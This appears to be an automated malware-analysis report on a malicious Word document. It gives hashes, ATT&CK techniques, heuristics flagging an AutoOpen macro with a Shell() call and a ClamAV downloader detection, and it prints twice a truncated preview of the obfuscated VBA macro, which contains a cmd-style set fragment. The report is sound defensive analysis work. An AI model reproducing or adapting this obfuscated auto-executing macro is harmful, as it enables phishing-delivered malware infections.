Office (OLE) malware analysis — malicious · a11a072ae4e300f7

MALICIOUS

Office (OLE)

122.4 KB Created: 2018-09-26 10:19:00 Authoring application: Microsoft Office Word First seen: 2018-10-09

MD5: d468056522a8aa643b6c5b40e7228cb7 SHA-1: 3ffe87e0e36ce043a3b266db97dbab3c69136aa7 SHA-256: a11a072ae4e300f739f9c66503fbb8712e7b64ee57611abcb2a353e6c1ffa892

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and the critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. The presence of the 'Doc.Downloader' ClamAV detection further supports this. The macro itself is heavily obfuscated, preventing a more detailed analysis of its specific actions.

Heuristics 6

ClamAV: Doc.Downloader.00536d-6697990-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6697990-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 87190 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	87190 bytes
SHA-256: `8f53abf5963a270636de0195cb88bb0b87ed8533d2987286bd3cb6b697d061f8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XjfLisDjucS" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim LiHOou(1) LiHOou(0) = Mid(UafDKY + ZZDrUlncEhwjZXsjZtQ + koPjaj, 924, 20) + MidB(riQRJavX + NljuDAArwjJPhVDJvHjA + pOljGdW, 581, 498) + MidB(HUjafiJw + SjJcEsNcjktMNlPVNfpYIZ + jQdXBc, 2, 441) + Mid(GBlInzb + ISoPvXzCdKADDZwJjRMq + ckkErrzu, 232, 849) Dim YAAwfA(1) YAAwfA(0) = Mid(cqNBUinK + GOzNIWMGDQZfkWohNpJE + ZfzDou, 640, 259) + Left(BqKsij + ZYCLdfJzdIGzrjqNC + iMlQU, 413) + Right(DdQbfRTN + uhvEFnqiTInVPpqZM + vCZipWiq, 460) + Left(tIwNiGzt + snPIvWPbopKHlsizMrvnzcN + LjbTf, 11) kWOmnIjtktpw (KeyString(iAYfz + bCzQiO + 9 + 14 + 44 + ivwbic + stLlNFrL) + ZQJKmOz + ZmUZd + KeyString(PQwcLYP + mmIIVLl + 10 + 16 + 51 + piJUJhiw + AYTisipb) + dSEYjani + ElNhAZ + tDsPmEqKVsi + jlLhSYdjl + qUTzAhjPhjp + wMJmzkP + iaWKjaaLVBw + LVdUUMkFd + WuzOP + wjALUzf) Dim RvwAPf(2) RvwAPf(0) = MidB(NPsMWi + iUFDAzcGAtMwEcZOF + uqLkBz, 55, 398) + Mid(udqfa + USwuOmWSEokzQBbOsPwcz + oSTqfd, 621, 599) RvwAPf(1) = Left(JTfDpRU + kiosBaLDiYpqwEzq + ESWOS, 934) + MidB(Czbhi + zZSPZRcAwKKpFlWEjMRii + AAjwIQ, 154, 928) + MidB(jbzsbRC + mDFRiKiUhhvjlbUXotC + GlCXL, 94, 904) + Mid(arJvj + zmnPRjwpbzzidOkKsvnSQ + jJtCVs, 353, 477) Dim TtqDT(1) TtqDT(0) = MidB(SOYiTpd + SbhuzTSoNUbczENmzwLkc + IvujUT, 437, 237) + MidB(RwQAaMPF + pPUXirdlGrFJWjEsB + aGtmzl, 426, 690) Dim iXXdWt(2) iXXdWt(0) = MidB(KECczWzv + wVoTmNMfzMBHsojSRFHM + BEIYlJn, 77, 990) + Mid(lKlJR + kdJwKAVPcPnpIBJEHZpZz + TqdwJzPZ, 545, 167) iXXdWt(1) = Right(uHDDu + LIzkiAANJvELoOhQTPYQ + DjOwEVuO, 163) + MidB(TGzzImjP + RQfZYdrZnrTqaQinApDr + XFTKcs, 6, 972) + Left(PiWfWQX + vAPYcWBcjPOMBuKj + rVCpFCtw, 339) + Mid(UhfNHj + GrYRZWqiibGqmfNjXU + Kwzur, 489, 987) Dim tjbtbW(1) tjbtbW(0) = Mid(bsaRGLpk + cKMjvoNiviFKMMZE + NDAaMpJz, 655, 957) + Mid(SHmRNnBE + FNVlYHuzjXIPGMjfNwzSJ + YvzlDNjV, 959, 743) + Left(RBFiijZ + fEGERZAvuMvdjddJbt + BISiIN, 284) + Mid(fCsqshl + ZprsfnRiECPhiFvzus + IbPbrIIv, 840, 411) Dim PioWp(2) PioWp(0) = MidB(kFzlhLH + YIDKTWczmvkFHnHUfK + hDiKo, 621, 27) + Right(DaTJUfn + pWCRzwSjuDmTEWGlMoT + JjinVkHT, 547) + Left(RBQEDM + GuzkqEwZCfNWHSAKzv + KoOSDFC, 653) + Mid(SstKwo + liRwRznIlDBYEUvbQBsWUf + iUzWL, 123, 629) PioWp(1) = Mid(SNXPY + QizuOXiVNoPsLWwPTLP + rvQsaXMr, 732, 920) + MidB(jAoGlbWz + QsVwBSvlBmEHqvcBw + GHkVHIik, 870, 883) Dim TiJdf(2) TiJdf(0) = Mid(iJjVz + LnmmtovjRPLazatmiDw + TiqDkY, 121, 346) + MidB(zVJFbH + wsOTlDAYbLarUSKzo + KzpEA, 103, 998) TiJdf(1) = MidB(fBfwDD + mwjziGwEdomRJoNQijDzAS + YlQnRSM, 204, 793) + MidB(fqsAS + SAVNSWmVRjhVaYTRq + EzzlcB, 502, 736) End Sub Attribute VB_Name = "XpzIKKTGQiwv" Function dSEYjani() QGhAKfV = "d \/ // //" + "// / \ / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207" ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02" Dim jqzRY(1) jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653) Dim iREfn(2) iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409) iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847) Dim ownPlI(2) ownPlI(0) = MidB(ZMTGzqu + ISnODpuwjAkJXCiZh + lZHZh, 940, 344) + Mid(MhAVPFjl + UmchdubKuIULGwjdiscX + ViOtSTzp, 690, 634) ownPlI(1) = Left(rifFm + msVuYjqHFErOquNRRaLi + XXWczZ, 126) + MidB(zvAkqJbq + fpJSwWQVRFaNtUAAJfzzY + HfWHpkWu, 931, 703) + MidB(aFhhl + YhGPpzHfEhrlbzPNbVESw + HtvcwMV, 761, 356) + MidB(PjKiv + OtcdcqwLAPUPKjNuDFVVwI + VoDtZO, 539, 649) Dim uZlXQ(1) uZlXQ(0) = MidB(YtbYSw ... (truncated)

SHA-256: 8f53abf5963a270636de0195cb88bb0b87ed8533d2987286bd3cb6b697d061f8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XjfLisDjucS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim LiHOou(1)
LiHOou(0) = Mid(UafDKY + ZZDrUlncEhwjZXsjZtQ + koPjaj, 924, 20) + MidB(riQRJavX + NljuDAArwjJPhVDJvHjA + pOljGdW, 581, 498) + MidB(HUjafiJw + SjJcEsNcjktMNlPVNfpYIZ + jQdXBc, 2, 441) + Mid(GBlInzb + ISoPvXzCdKADDZwJjRMq + ckkErrzu, 232, 849)
   Dim YAAwfA(1)
YAAwfA(0) = Mid(cqNBUinK + GOzNIWMGDQZfkWohNpJE + ZfzDou, 640, 259) + Left(BqKsij + ZYCLdfJzdIGzrjqNC + iMlQU, 413) + Right(DdQbfRTN + uhvEFnqiTInVPpqZM + vCZipWiq, 460) + Left(tIwNiGzt + snPIvWPbopKHlsizMrvnzcN + LjbTf, 11)
kWOmnIjtktpw (KeyString(iAYfz + bCzQiO + 9 + 14 + 44 + ivwbic + stLlNFrL) + ZQJKmOz + ZmUZd + KeyString(PQwcLYP + mmIIVLl + 10 + 16 + 51 + piJUJhiw + AYTisipb) + dSEYjani + ElNhAZ + tDsPmEqKVsi + jlLhSYdjl + qUTzAhjPhjp + wMJmzkP + iaWKjaaLVBw + LVdUUMkFd + WuzOP + wjALUzf)
   Dim RvwAPf(2)
RvwAPf(0) = MidB(NPsMWi + iUFDAzcGAtMwEcZOF + uqLkBz, 55, 398) + Mid(udqfa + USwuOmWSEokzQBbOsPwcz + oSTqfd, 621, 599)
RvwAPf(1) = Left(JTfDpRU + kiosBaLDiYpqwEzq + ESWOS, 934) + MidB(Czbhi + zZSPZRcAwKKpFlWEjMRii + AAjwIQ, 154, 928) + MidB(jbzsbRC + mDFRiKiUhhvjlbUXotC + GlCXL, 94, 904) + Mid(arJvj + zmnPRjwpbzzidOkKsvnSQ + jJtCVs, 353, 477)
   Dim TtqDT(1)
TtqDT(0) = MidB(SOYiTpd + SbhuzTSoNUbczENmzwLkc + IvujUT, 437, 237) + MidB(RwQAaMPF + pPUXirdlGrFJWjEsB + aGtmzl, 426, 690)
   Dim iXXdWt(2)
iXXdWt(0) = MidB(KECczWzv + wVoTmNMfzMBHsojSRFHM + BEIYlJn, 77, 990) + Mid(lKlJR + kdJwKAVPcPnpIBJEHZpZz + TqdwJzPZ, 545, 167)
iXXdWt(1) = Right(uHDDu + LIzkiAANJvELoOhQTPYQ + DjOwEVuO, 163) + MidB(TGzzImjP + RQfZYdrZnrTqaQinApDr + XFTKcs, 6, 972) + Left(PiWfWQX + vAPYcWBcjPOMBuKj + rVCpFCtw, 339) + Mid(UhfNHj + GrYRZWqiibGqmfNjXU + Kwzur, 489, 987)
   Dim tjbtbW(1)
tjbtbW(0) = Mid(bsaRGLpk + cKMjvoNiviFKMMZE + NDAaMpJz, 655, 957) + Mid(SHmRNnBE + FNVlYHuzjXIPGMjfNwzSJ + YvzlDNjV, 959, 743) + Left(RBFiijZ + fEGERZAvuMvdjddJbt + BISiIN, 284) + Mid(fCsqshl + ZprsfnRiECPhiFvzus + IbPbrIIv, 840, 411)
   Dim PioWp(2)
PioWp(0) = MidB(kFzlhLH + YIDKTWczmvkFHnHUfK + hDiKo, 621, 27) + Right(DaTJUfn + pWCRzwSjuDmTEWGlMoT + JjinVkHT, 547) + Left(RBQEDM + GuzkqEwZCfNWHSAKzv + KoOSDFC, 653) + Mid(SstKwo + liRwRznIlDBYEUvbQBsWUf + iUzWL, 123, 629)
PioWp(1) = Mid(SNXPY + QizuOXiVNoPsLWwPTLP + rvQsaXMr, 732, 920) + MidB(jAoGlbWz + QsVwBSvlBmEHqvcBw + GHkVHIik, 870, 883)
   Dim TiJdf(2)
TiJdf(0) = Mid(iJjVz + LnmmtovjRPLazatmiDw + TiqDkY, 121, 346) + MidB(zVJFbH + wsOTlDAYbLarUSKzo + KzpEA, 103, 998)
TiJdf(1) = MidB(fBfwDD + mwjziGwEdomRJoNQijDzAS + YlQnRSM, 204, 793) + MidB(fqsAS + SAVNSWmVRjhVaYTRq + EzzlcB, 502, 736)
End Sub


Attribute VB_Name = "XpzIKKTGQiwv"
Function dSEYjani()
QGhAKfV = "d \/ //   //" + "// / \  / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207"
ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02"
Dim jqzRY(1)
jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653)
   Dim iREfn(2)
iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409)
iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847)
   Dim ownPlI(2)
ownPlI(0) = MidB(ZMTGzqu + ISnODpuwjAkJXCiZh + lZHZh, 940, 344) + Mid(MhAVPFjl + UmchdubKuIULGwjdiscX + ViOtSTzp, 690, 634)
ownPlI(1) = Left(rifFm + msVuYjqHFErOquNRRaLi + XXWczZ, 126) + MidB(zvAkqJbq + fpJSwWQVRFaNtUAAJfzzY + HfWHpkWu, 931, 703) + MidB(aFhhl + YhGPpzHfEhrlbzPNbVESw + HtvcwMV, 761, 356) + MidB(PjKiv + OtcdcqwLAPUPKjNuDFVVwI + VoDtZO, 539, 649)
   Dim uZlXQ(1)
uZlXQ(0) = MidB(YtbYSw
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.